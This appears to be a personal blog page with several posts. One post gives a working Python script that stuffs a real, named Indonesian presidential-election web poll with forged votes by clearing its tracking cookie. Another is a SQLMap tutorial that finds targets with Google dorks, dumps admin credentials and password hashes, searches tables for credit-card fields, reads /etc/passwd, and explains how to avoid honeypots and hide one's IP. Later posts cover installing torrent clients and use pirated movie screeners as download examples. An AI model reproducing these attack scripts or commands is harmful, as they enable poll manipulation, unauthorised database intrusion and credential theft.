franx47

Automatic Online Polling Submit POST using Python

Posted in Anything, Bot Script, Python Programming by franx47 on June 20, 2014

Good night,

Ever heard of online polling? Yes, it’s a kind of application for online polling usually used by a personal/company to gather information from online users, especially designed with special question for certain moment or purpose.

In web application, we can build the online polling using PHP with nice CSS, or just use the 3rd party application, like in Joomla, there are lot of free nice online polling extensions ready to download & install.

What kinda logic does the online polling application uses? Mainly, the operation is pretty simply, record what online users submitted as theirs choice and save it into the database. Next, for the security reason, check user session or cookies, to avoid user participates in the same polling twice. But, what if the application fails to check the user cookies? Or the polling application didn’t save the user cookies in the database? Ofcourse, user has the chance to submit for the polling more than once.

In the midst of the presidential election campaign in my country, I’m curios looking for any online poll on the net, to get information about user interest of who will be his/her choice for the next President. Then, I found this website that offers for Presidential election online poll:

http://pemilunews.com/index.php/polling-capres-2014

I played with the poll by submitting my choice and then redirected to the same page. When I tried to reload/refresh the page, there’s a message shows that I can’t participate again on the poll for more than one, because I already submitted my choice. Curious, I then looked my Cookies Manager on Firefox, and check the cookies element one by one. Then, I found something interesting, that there’s a certain cookies name, that if I change the value from “1” to “0” or just fill it with empty string, then reload again the page, the poll form shows again. Means, the poll application didn’t check for the user’s IP address nor the user cookies file in the database. :)

Alright, let’s go to the real action!

1. My target here is this site:

http://pemilunews.com/index.php/polling-capres-2014

<meta name="generator" content="Joomla! 1.7 - Open Source Content Management" />
<link rel="stylesheet" href="/templates/ja_teline_iii/...

Viewing the page source, looks like the site was developed with Joomla 1.7 (it’s an old Joomla version, now has come to version 3.x. Maybey the admin forgot or too lazy to upgrade it) and with the template name “ja_teline_iii”. Yeah I know this template, I got it from Joomla template nulled site.

2. When I open the site for the first time (fresh IP, fresh cookies), there’s a poll form. Checking the cookies file using Cookies Manager addon on Firefox, there are only 2 cookies elements.

image1

3. I tried to submit my choice and after redirecting to the same page, there’s a message shown there: “You have already voted for this poll!”.

image2

I then checking again the Cookies Manager, and found that there’s a new cookies element saved.

image3

4. Look at the new cookies element, there’s an element with the name “0f788b183123db61821b460064e6d6cd” and content “1”. But, what if I change the content of this element, eg: change to “0” or give it an empty string (?).

image4

Reload the page. And I got the new poll submit form again, means I can vote it again.

image5

5. But, I don’t want to do it manually, by reloading the page, changing the cookies content, reload again, submit vote, etc.. I want to do it automatic with script. And I think Python will just do it easily.

To build the automatic script, I need to identify the form elements, as the data will be used for HEADER information in HTTP POST.

Viewing the page source, I got this complete information:

<div id="poll_comp_form">
	<form action="/index.php/polling-capres-2014" method="post" name="poll_form2">
				<label for="voteid1" class="pollsectiontableentry2" style="display:block; padding:2px;">
				<input type="radio" name="voteid" id="voteid1" value="1" alt="1" />
				PRABOWO - HATTA			</label>
						<label for="voteid2" class="pollsectiontableentry1" style="display:block; padding:2px;">
				<input type="radio" name="voteid" id="voteid2" value="2" alt="2" />
				JOKOWI - JK			</label>
						<label for="voteid3" class="pollsectiontableentry2" style="display:block; padding:2px;">
				<input type="radio" name="voteid" id="voteid3" value="3" alt="3" />
				BELUM MENTUKAN PILIHAN			</label>
						<label for="voteid4" class="pollsectiontableentry1" style="display:block; padding:2px;">
				<input type="radio" name="voteid" id="voteid4" value="4" alt="4" />
				GOLPUT			</label>
				    
	    <div style="padding:2px; text-align:left;">    
	    	<input type="submit" name="task_button" class="button" value="Vote" />
	    </div>    
	    
	    <input type="hidden" name="option" value="com_acepolls" />
	    <input type="hidden" name="task" value="vote" />
	    <input type="hidden" name="id" value="1" />
	    <input type="hidden" name="af71e64541c2fe7653be3c0bdd5ab511" value="1" />	</form>
</div>

Alright, so now I have these DATA for POST submit:

voteid: 2, // this is the radio button name/id (also my choice for the President) 
task_button: Vote,
option: com_acepolls, // this the Joomla extension name for online poll
task: vote,
id: 1,
2f8c89c440992cb0b6d098f777217d78: 1 // this is the hidden element that always change every period of time
form_id: poll_form2 // the form name

6. So, what to do next? Okay, I need to build the header information along with the data submit post. I can get it easily using “Live HTTP Headers” addons installed on Firefox. Let us see what kinda header information being submitted when I try to submit the poll.

image6

image7

When I click replay, it will submit the data through HTTP POST to the server. I can just edit/change the cookie element content to “0” or give it empty string, then reload it again, and the data will be submitted.

The main idea is, I want it to be automatic, without setting this and that manually.

7. I make Python script to handle for this POST operation. First, identify the online poll URL link.

import sys,re,httplib,urllib,string

url = "http://pemilunews.com/index.php/polling-capres-2014"

Here I use httplib and urllib library from Python to make HTTP POST operation.

8. Set the POST DATA information.

# post data login
params = urllib.urlencode({
  'voteid': '2',
  'task_button': 'Vote',
  'option': 'com_acepolls',
  'task': 'vote',
  'id': '1',
  'af71e64541c2fe7653be3c0bdd5ab511': '1' 
  #'form_id': 'poll_form2'
})

Remember, this hidden element is very important ‘af71e64541c2fe7653be3c0bdd5ab511′: ‘1’. Even if the script works automatically using Python, the hidden element always change every period of time or after several POST submits. In my case, it will change every 247 times POST submit operations. So, after this, I need to manually reload the page again in my browser, and get the hidden element name/id.

9. And, this is the HEADER information I got from the previous Live HTTP Headers.

headers = {
      'Host': 'pemilunews.com',
      'User-Agent': 'Mozilla/5.0',
      'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
      'Accept-Language': 'en-US,en;q=0.5',
      'Accept-Encoding': 'gzip, deflate',
      'Referer': 'http://pemilunews.com/index.php/polling-capres-2014',
      'Cookie': '0f788b183123db61821b460064e6d6cd=; ja_teline_iii_tpl=ja_teline_iii; 8200a02e7328871c0ca1210e5c52c27f=2f455d63fcfdd6e3a44ea34e2a9ac241',
      'Connection': 'keep-alive',
      'Content-Type': 'application/x-www-form-urlencoded',
      'Content-Length': '95'
}

Take a look at this: “‘0f788b183123db61821b460064e6d6cd=;” I set the content/value to empty string or just give it “0” value. This is important, as it will be used by the poll application to identify the user cookies, to check if the user has submitted for the poll or not.

And this: “8200a02e7328871c0ca1210e5c52c27f=2f455d63fcfdd6e3a44ea34e2a9ac241′”, is the cookie element we can identify using Cookies Manager addon above. It always change whenener I change my IP, or closing the web browser, and accessing again the page.

10. And here comes the real action.

for i in xrange(260):
        conn = httplib.HTTPConnection("www.pemilunews.com")
        conn.request("POST", "/index.php/polling-capres-2014", params, headers)
        response = conn.getresponse()

        print i, response.status, response.reason
        data = response.read()
        conn.close()

I set the “for” loop until 260 times. Means there will be 260 POST submit operations, means the result poll for certain choice (I expected) will be increased by 260.

How to know that the submit form is success? From the poll application behaviour, I recognize that after user submit for the poll, it will be redirected to the same page. And page redirection itself is known as “302” HTTP code. Means the submit POST is successful.

And how do I know that submit POST failed? If the response code changing from “302” to “200”, this means there is a problem with the web page form. And I know this must be related to the hidden element value that has changed, and the cookie element.

Here are the 2 values that should be monitored:

'af71e64541c2fe7653be3c0bdd5ab511': '1' // the hidden element name/id
8200a02e7328871c0ca1210e5c52c27f=2f455d63fcfdd6e3a44ea34e2a9ac241 // the cookie element value/content

Those 2 elements above will only change under these circumstance:

1. If the script starts to give response code “200”,
2. I change my IP address (disconnect modem),
3. I completely delete/remove the cookies elements for that site.

If those conditions above ever happen, then I need to re-identify the 2 values above and set it to the script manually. Otherwise, the script won’t work as expected.

11. And here’s how the Python script runs.

image8

image9

Look, the submit POST operation success from number 0 to 247 by giving 302 response code, and fails at number 248, it starts to give 200 response code. If this happen, then I should do the procedure like above, set the value to the script, and run it again.

This is not full automatic poll submit using Python, but rather as a half-automatic script. You are free to improve this code as you wish.

This script still needs to be fixed on:

1. Grab the hidden element name/id automatically from HTML when the response code changes to “200”,
2. Grab the cookies element value by reloading/opening the web page automatically,
3. Set those 2 values above into the script, and start to loop the SUBMIT POST again.

You can download this Python script here:

http://q.gs/3475036/automatic-polling-submit-post

Thanks for reading. :)

SQLMap Injection with Samples

Posted in CentOS 6, Database, Hacking, Metasploit Framework, Python Programming, Shell, SQL Injection, SQLMap, VPS by franx47 on January 15, 2014

Hi,

So, here I want to post little about how to use SQLMap in practice.

In my previous post, I’ve shown you how to install SQLMap from GitHub and learn the command options that used most on injection attack.

I’ll start directly from the injection attack samples that used the most command options, so you can practice it further by yourself later.

If you haven’t installed SQLMap, you can read my previous post here:

http://franx47.wordpress.com/2013/02/01/using-sqlmap-for-sql-injection

# Start SQLMap

$ ./sqlmap.py --update

$ ./sqlmap.py

$ ./sqlmap.py -hh

1. Command option -u

Let’s say, we have target something like:

http://www.domain.com/article.php?id=7

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs

–random-agent: using random browser agent (Firefox, IE, Opera, etc..)
–level: level of injection test to perform (1..5)
–risk: level of injection risk to perform (1..3)
–threads: count of injection attack process thread. Using high number of thread will make the injection attack process run fast, especially in Union, Boolean, Error, Stacked, and Query based type, but avoid using more than 1 thread in Time-based attack.
–batch: make the injection process run automatically, without user input.
–dbs: get database info

That command above will perform attack alternately based on BEUSTQ (Boolean, Error, Union, Stacked, Query, Time), by default. To focus the attack with spesific attack technique, you can set it in the injection command, for example when you do manual injection to this target by doing something like this:

http://www.domain.com/article.php?id=7'

http://www.domain.com/article.php?id=7 and 1=0

and you see there’s an SQL error message on the page, then you might want to set the attack technique with option: –tech=E

Otherwise, if you see nothing, but you are quite sure that there’s an injection point on that page or just want to test the injection, you can leave it the attack technique type to be unset.

2. Command option -g (crawl potential targets from Google results)

With the -g option, we can crawl any potential targets from Google results based on the dork inputted.

Injection command:

$ ./sqlmap.py -g "intext:article.php?id=" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs

To crawl from certain site based on where the country domain registered, eg: .com.sg

$ ./sqlmap.py -g "intext:article.php?id= + site:.com.sg" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs

Ofcourse, you can use any other Google dorks as you wish.

If you see no attack being processed, that means there is no potential injection point that can be injected. Potential injection point of the URL link should contains at least one GET parameter, eg: .php?id=, .asp?pid=, etc..

3. Command option –crawl

Injection command:

$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --dbs

That command above will crawl to every links found in certain website and will inject link which has GET parameter in it.

–crawl: crawl through every links in a website page. We use –crawl=3 means it will crawl deeply till the depth of “3”.

For example:

http://www.domain.com, has a menu link called “articles”.

Depth 1: http://www.domain.com/articles
Depth 2: http://www.domain.com/articles/newest/
Depth 3: http://www.domain.com/articles/newest/funny-topics/
Depth 4: http://www.domain.com/articles/newest/funny-topics/author/

Our option –crawl=3 will crawl any links found in depth 1, 2, and 3, but not depth 4. Okay, hope you understand.

You are free to set any crawl depth as you want. But, remember the more you set the crawl depth, the more you will get many links to inject (if it has GET parameter).

4. Command option –forms

Injection command:

$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --forms --dbs

That command above will try to search for any POST form in the website page. For example: in homepage there will be some forms like search, login forms, etc.

But, how if the POST form are in another page deeply in the website and we don’t know where it is? We can join with the previous command –crawl.

$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --forms --dbs

5. Command option –proxy

The proxy option format is: (http|https|socks4|socks5)://url:port

Find some working IP proxy and port, eg: http://hidemyass.com/proxy-list

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --proxy="https://123.123.123.123:3128" --dbs

6. Command option –dbms

Suppose that we’re pretty sure that the target website uses database type MySQL. We can set it in the command with option –dbms=mysql, so that it will be faster in injection attack, rather than rotate through all of database types, like Oracle, MSSQL, etc.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --forms --dbms=mysql --dbs

7. Command option -D, -T, -C

-D: dump database
-T: dump table
-C: dump column

Let’s say we got database name like: sitedb.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T

That command above will enumarate all tables name from certain database that is “sitedb”.

Let’s say we got 15 tables name, one of them is: admin. And we want to enumerate for its columns name.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C

That command above will enumarate all columns name from certain database that is “sitedb” and table “admin”.

Let’s say we got 6 columns name, eg: id, admin_id, admin_pass, admin_fullname, admin_mail, admin_level.

We want to dump all the data in table “admin”.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin --dump

Or if you want to dump only certain columns, like “admin_id” and “admin_pass”.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin_pass --dump

8. Command option –answers

This option is vry useful if you want the attack process run 100% automatically without any user input.

For example, when you are dumping data from certain table (see command option 6 above), SQLMap will automatically try to crack any string that has format like “password hash”.

Eg:

In dumping the table “admin”, you got 3 record rows, those are:

admin:0cc175b9c0f1b6a831c399e269772661
manager:92eb5ffee6ae2fec3ad71c777531578f
staf:4a8a08f09d37b73795649038408b5f33

Since it found field data like “0cc175b9c0f1b6a831c399e269772661″ which has format like MD5-hash, SQLMap will try to crack it automatically using wordlist in dir “txt”. Cracking 3 hashes with only few wordlist, would take a short time. But what if the hashes found are about 10,000 records and the wordlist count is more than 100,000,000 lines?? Wouldn’t it take long time to wait.

The best idea is dump all data first, then the cracking process can be done later separately. For this purpose, we can use command option –answers, to make SQLMap skip “cracking” process.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin-pass --dump --answers="crack=N"

–answer=”crack=N”, we take certain unique particular string from the cracking question, that is “crack”, and we set it to “N” = No.

9. Command option –flush-session

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --flush-session

That command above will make SQLMap to flush all sessions found from previous injection targetted to certain website. This is very useful when you do injection with T (Time) based attack, as sometimes there’s a lagging connection to the target website.

But, be careful using –flush-session, as it will delete all injection sessions and file for that target. This option means the next injection process will start from zero, as if we never inject the target before.

10. Command option –hex

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin-pass --dump --hex --tech=T

Using –hex option is very useful when the injection process uses T (Time) based. Means that the data being retrieved are converted to HEX (hexadecimal) digits before it starts to deliver. This also to avoid any strange characters being retrieved.

11. Command option –no-cast

“cast” function in MySQL means, to convert a string to a different character set.

Eg:

SELECT CAST(_latin1'test' AS CHAR CHARACTER SET utf8);

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --no-cast

Note that, we can’t join between –no-cast and –hex option. We have to choose one of them in a command.

12. Command option –dump-all

To dump all databases found, but exclude “information_schema” DB or exclude DBMS system database.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dump-all --exclude-sysdbs

13. Command option –count

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin --count

To count records/rows in a certain table. Very useful if you want to check how many records/rows in a table before dumping it.

14. Command option –start, –end

Let’s say we found table “member” and there are about 24,000 records in it. And we want to dump start from record “1000” to “2000”.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T member --dump --answers="crack=N" --start=1000 --end=2000

15. Command option –search

Let’s say there are about 90 tables in a certain database, and we want to short our time looking for table contains certain “field name”. Eg: credit_card_type.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --search="credit_card_type"

It will search through the whole tables in database “sitedb” and find for field name “credit_card_type”.

16. Command option –delay

This option –delay sometime used with T (Time) based attack type, to avoid lagging connection from/to the target and to retrieve data precisely.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --batch --dbs --delay=5 --tech=T

Note, when we use –delay in Time based attack type, there is no “thread” being set. Thread is only 1, by default.

–delay=5, means delay between one attack to next attack is 5 seconds.

17. Command option –common-tables, –common-columns

Suppose we got database name “sitedb”, the database type is MySQL version 4.0. As we know that MySQL version 4 doesn’t have “information_schema” system database, so it will be hard to enumerate the tables/columns name. We gonna use “fuzzing/bruteforcing” technique to get the table and column name.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --common-tables

That command above will try to bruteforce for the table name based on the tables name list.

Let’s say we have found one table, eg: member. But we don’t have any idea what the column name is. Next, we gonna bruteforce for the column name.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --common-columns

That command above will try to bruteforce for the column name based on the columns name list.

18. Command option –sql-shell

To prompt for an interactive SQL shell command.

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --sql-shell

It will show an interactive SQL shell command.

For example, we want to make SQL query from table “admin”.

> select count(*) from admin;

You can also use –sql-query directly from the injection command, eg:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --sql-query="select count(*) from admin"

19. Command option –msf-path

To prompt a shell which relates to MSF (Metasploit) Framework. Install MSF first before using this command option.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --msf-path="the_MSF_path_where_it_is_installed"

20. Command option –file-read

To read any (readable) file in the server.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --file-read="/etc/passwd"

21. Command option –tamper

To use tamper for the injection attack. For example, we want to give the injection attack with string “+” for any space character in it. Means it will convert all spaces with string “+”.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --tamper tamper/space2plus.py

To short the command for tamper link, you can set shortcut link for all tamper scripts in dir “tamper”.

$ ln -s tamper/space2plus.py space2plus.py

Do the same for other tamper scripts you want to make shortcut for it.

22. Command option –users, –passwords, –roles, –privileges, –is-dba

–users: to enumerate all database users
–passwords: to enumerate all database paswords for each of the users
–roles: to enumerate all roles for each of the users
–privileges: to enumerate all privileges for each of the users
–is-dba: to check whether the current database user is a Database Administrator or not

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --users --passwords --roles --privileges --is-dba

Useful if you want to check whether the current database user is a DB Administrator or not, or to check the user has “write” privilege or not. If the user has “write” privilege, then we might has chance to write file on the server. It’s just like “mysql_into_outfile” command.

Okay, I think that’s enough for this post. I’m so sleepy and want to take a rest.

Good luck with your injection.

Note:
– If you do injection with SQLMap from VPS (Virtual Private Server) and process google results, be careful .. sometimes you don’t realize that the target site you’re attacked is a “honeypot“. It’s a trap usually set by security company or internet monitoring company. Once you’re trapped in the honeypot server, it will record all your injection/hacking activities and your IP. Then, the company authority will file for legal report to your hosting company, and you gonna get warning from them very soon. You’re lucky if you only get warning, but if you do that many times, hosting company may block/suspend your VPS service because of illegal activities. So, just be careful with the target you’re trying to hack, you can use proxy IP to cover your real IP.

How To Install Transmission Torrent Client On Linux

Posted in CentOS 6, Download, Shell, Torrent, Transmission, VPS by franx47 on January 11, 2014

Hi,

Good nite and happy saturday nite.

So, here I want to share about how to install Transmission on Linux. What is it? It’s another torrent client used to download and upload files on torrent.

From Wiki:

"Transmission is a BitTorrent client which features a simple interface on top of a cross-platform back-end. Transmission is free software licensed under the terms of the GNU General Public License (GPL), with parts under the MIT License".

In my previous post, I’ve shown you about installing rtorrent on Linux. But, as I’m using it, I got problem with Magnet torrent link and some of DHT trackers. So, now I’m moving to “transmission”. It has no problem with Magnet torrent link and any DHT trackers.

In this post, I’m using Xen-VPS with OS Centos 6.4 64bit.

# How To Install:

1. First, if your VPS doesn’t has rpmforge repo, I recommend you to add it in the repository.

- Import the GPG key

$ rpm --import http://apt.sw.be/RPM-GPG-KEY.dag.txt

2. Download the rpmforge-release package

(for x86_64 or 64 bit OS)
$ wget http://pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm

(for i686 or 32 bit OS)
$ wget http://pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.3-1.el6.rf.i686.rpm

How to check your OS machine bit, type this command:

$ uname -i

3. Verifiy the package.

$ rpm -K rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm

4. Install the package with rpm command.

$ rpm -i rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm

5. Try to install something like “htop”.

$ yum install htop

6. Update VPS with YUM.

$ yum update

Okay, so now we have repository files from rpmforge. Next, we’re gonna install the “Tranmission” torrent client. There are Tranmission which is GUI based and command line based. In this case, I’m using VPS with command line only, no GUI, so I install “tranmission-cli”. If you want to install for the GUI based, you can install the “transmission”.

$ yum install tranmission-cli

After installation done, you can check the location of the program.

$ which tranmission-cli
/usr/bin/transmission-cli

$ transmission-cli

Okay, now the tranmission-cli ready to use.

Well, ever wondering about the length of the program name you have to type everytime you want to use it, for example: typing “transmission-cli” is a bit too long, so how to make it short and fast. We will set an alias for this command by adding alias line into .bashrc and .bash_profile.

1. Go to /root and modify the .bashrc and .bash_profile file under it. In Ubuntu, .bashprofile is same with .profile file.

$ nano .bashrc

In this case, I’m shorting the “transmission-cli” to “tcl”, but you are free to set any short name for it as you wish. Add this line:

alias tcl="/usr/bin/transmission-cli"

Save it.

$ nano .bash_profile

Add this line:

alias tcl="/usr/bin/transmission-cli"

Save it.

To take effect immediately, we can use this command:

$ source .bashrc
$ source .bash_profile

Alright, so now we can call the “transmission-cli” program by typing this command:

$ tcl

Ok, so now we are ready to go. For example, we wanna download this movie from kickass.to.

“The Secret Life of Walter Mitty 2013 DVDscr XViD NO1KNOWS”

http://kickass.to/the-secret-life-of-walter-mitty-2013-dvdscr-xvid-no1knows-t8530095.html

You can either use the torrent file or magnet link.

Note, Tranmission program will save the downloaded file under /root/Downloads, by default. But, you can also change the location where to save the file.

Start to download with tranmission-cli:

$ tcl -w /var/www/html/download http://kickass.to/torrents/the-secret-life-of-walter-mitty-2013-dvdscr-xvid-no1knows-t8530095/

On that command above, the file will be saved in directory /var/www/html/download.

And, how if we want to let the torrent opens after completed downloading and we want to download another files from torrent with tranmission-cli, let say we want to be a seeder (not a leecher!)?

Okay, to avoid port colission between one session and another, we will use different port for each of the sessions. We do this with this command:

- Torrent 1:

$ tcl -p 15000 -w /var/www/html/download http://kickass.to/torrents/the-secret-life-of-walter-mitty-2013-dvdscr-xvid-no1knows-t8530095/

- Torrent 2:

$ tcl -p 16000 -w /var/www/html/download http://kickass.to/torrents/the-wolf-of-wall-street-2013-dvdscr-xvid-bida-t8524359/

You can set any port number as you want, but it’s better to set port range higher than 10000 and under 65000. Just make sure the port that you wish to set is not being used by another application/program.

Additional thing, let say, we dont want to wait for the download process because of the size of the file. For example, you want to download file with size 6 GB and we have shitty internet connection (under 512 Kbps), and we have another important things to do that force us to logout/exit the SSH session, but we dont want the download process terminated. Can we just let the download process and back after several minutes/hour later? Yes, we will use “screen” to help us for this.

What is “screen” command?

From cyberciti.biz:
"Screen is a full-screen window manager that multiplexes a physical terminal between several processes (typically interactive shells). The same way tabbed browsing revolutionized the web experience, GNU Screen can do the same for your experience in the command line. Instead of opening up several terminal instances on your desktop or using those ugly GNOME/KDE-based tabs, Screen can do it better and simpler. Not only that, with GNU Screen, you can share sessions with others and detach/attach terminal sessions. It is a great tool for people who have to share working environments between work and home."

Okay, we will install “screen” package.

$ yum install screen

After installing, we will use this screen command for our torrent process.

$ screen

Typing that screen command above will give us a “screen” window and we’re already in it. For example, we want to use screen for out torrent process: tcl -p 15000 -w /var/www/html/download http://kickass.to/torrents/the-secret-life-of-walter-mitty-2013-dvdscr-xvid-no1knows-t8530095/

$ tcl -p 15000 -w /var/www/html/download http://kickass.to/torrents/the-secret-life-of-walter-mitty-2013-dvdscr-xvid-no1knows-t8530095/

To detach the process in screen session, press “CTRL + A”, then press “d”.

The screen session has been detached.

To add other screen session for our second torrent, just do the command like above and we get second screen session.

To list all of screen sessions, use this command:

$ screen -ls

To quit or stop the session, we can use 2 ways:

(Method 1)
1. Go into the detached session.

$ screen -r [screen-session-ID]

eg: screen -r 1886

2. We will go into the session (torrent) process, to stop the session, press “CTRL + A”, then type “:quit”.

It will stop the screen session, along with the torrent process.

(Method 2)
To stop certain screen session ID, use this command:

$ screen -X -S [screen-session-ID] kill

Okay, I think that’s enough for this post. Sorry, if it’s too long, but trust me you’re gonna use this for your torrent process.

One more, dont forget to quit/stop the torrent process after you have been seeding the file for more than “x” seeds or how many times you wish to seed. Consider also your VPS bandwidth used and the disk quota.

# Note:

In Ubuntu, if you got error message like this:

[16:19:32.025] RPC Server: Adding address to whitelist: 127.0.0.1
[16:19:32.025] UDP: Failed to set receive buffer: requested 4194304, got 262142
[16:19:32.025] UDP: Please add the line "net.core.rmem_max = 4194304" to /etc/sysctl.conf
[16:19:32.025] UDP: Failed to set send buffer: requested 1048576, got 262142
[16:19:32.025] UDP: Please add the line "net.core.wmem_max = 1048576" to /etc/sysctl.conf

You can try to increase the receive buffer with this command:

$ echo 'net.core.rmem_max = 16777216' >> /etc/sysctl.conf
$ echo 'net.core.wmem_max = 4194304' >> /etc/sysctl.conf
$ sysctl -p

How to Install Torrent on Linux VPS (Centos 6)

Posted in Anything, CentOS 6, Download, Shell, Torrent, VPS by franx47 on December 29, 2013

Hello friend,,

I wanna share about how to install Torrent application in your VPS (Virtual Private Server) based on command terminal line only, not for GUI (Graphical User Interface) based.

In this case, I’m using Centos RHEL 6.5.

$ yum update

$ cat /etc/redhat-release
CentOS release 6.5 (Final)

# Torrent Installation Procedure

Here are the step by step for installation procedure:

1. To install libTorrent and rTorrent first we install the compiler and dependencies required

$ yum install gcc gcc-c++ m4 make automake libtool pkgconfig perl openssl-devel ncurses-devel

2. Download curl, libsigc++, libtorrent and rtorrent

$ wget http://curl.haxx.se/download/curl-7.19.7.tar.gz

$ wget http://ftp.gnome.org/pub/GNOME/sources/libsigc++/2.2/libsigc++-2.2.4.tar.gz

$ wget http://libtorrent.rakshasa.no/downloads/libtorrent-0.12.5.tar.gz

$ wget http://libtorrent.rakshasa.no/downloads/rtorrent-0.8.5.tar.gz

3. Extract curl, libsigc++, libtorrent and rtorrent

$ tar -xvzf curl-7.19.7.tar.gz

$ tar -xvzf libsigc++-2.2.4.tar.gz

$ tar -xvzf libtorrent-0.12.5.tar.gz

$ tar -xvzf rtorrent-0.8.5.tar.gz

4. Compile curl

$ cd curl-7.19.7
$ ./configure
$ make
$ make install

5. Compile libsigc++

$ cd libsigc++-2.2.4
$ ./configure
$ make
$ make install

6. Compile libtorrent

$ export PKG_CONFIG_PATH=/usr/local/lib/pkgconfig
$ cd libtorrent-0.12.5
$ rm -f scripts/{libtool,lt*}.m4
$ ./autogen.sh
$ ./configure
$ make
$ make install

7. Compile rtorrent

$ cd rtorrent-0.8.5
$ rm -f scripts/{libtool,lt*}.m4
$ ./autogen.sh
$ ./configure
$ make
$ make install

8. Download rtorrent sample configuration and rename it

$ wget http://libtorrent.rakshasa.no/export/1105/trunk/rtorrent/doc/rtorrent.rc
$ mv rtorrent.rc .rtorrent.rc

Place this .rtorrent.rc under /root user directory.

To set the default directory to save the downloaded torrent file, uncomment and change this line:

# Default directory to save the downloaded torrents.
# directory = ./

to any directory you wish.

eg:
# Default directory to save the downloaded torrents.
directory = /home/download

9. Ready to use rtorrent application.

eg:

Download movie from: http://kickass.to/the-hobbit-the-desolation-of-smaug-2013-dvdscr-xvid-ac3-hive-cm8-t8451258.html

$ rtorrent http://kickass.to/torrents/the-hobbit-the-desolation-of-smaug-2013-dvdscr-xvid-ac3-hive-cm8-t8451258/

Command: “rtorrent” to download from Torrent Link

rtorrent screen view

How To Use Speedtest.net from VPS Command Line

Posted in Anything, Python Programming by franx47 on July 21, 2013

Good day ppl,

Here I got nice post from here about how to use speedtest.net from VPS command line.

I’m sure all of you have known speedtest.net, that is a free website that offers for testing our internet speed from and to various servers. Speedtest.net uses flash for this purpose, so this will be a hassle for most of command-line VPS.

Fortunately, there’s a Python script that enables users to run it in a VPS command line. The script can be found here https://github.com/sivel/speedtest-cli‎. Mininum Python version is 2.4.

Download here:

wget -O speedtest-cli.py https://github.com/sivel/speedtest-cli/raw/master/speedtest_cli.py

 

For testing purpose (use the closest server from our PC/VPS):

# python speedtest-cli.py --share

To look up for full help/informations about this script, use this command:

# python speedtest-cli.py -h

[root@host src]# python speedtest-cli.py -h
Usage: speedtest-cli.py [options]

Command line interface for testing internet bandwidth using speedtest.net.
--------------------------------------------------------------------------
https://github.com/sivel/speedtest-cli

Options:
-h, --help show this help message and exit
--share Generate and provide a URL to the speedtest.net share
results image
--simple Suppress verbose output, only show basic information
--list Display a list of speedtest.net servers sorted by distance
--server=SERVER Specify a server ID to test against

Here I attach my VPS speed test result from various servers and locations in the world. Just for sample purpose.

# VPS 1 (USA)
[root@host src]# python speedtest-cli.py --server=2112 --share
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
Testing from OC3 Networks & Web Solutions, LLC (xxx.xxx.xxx.xxx)...
Hosted by SingTel (Singapore) [14126.60 km]: 71.685 ms
Testing download speed........................................
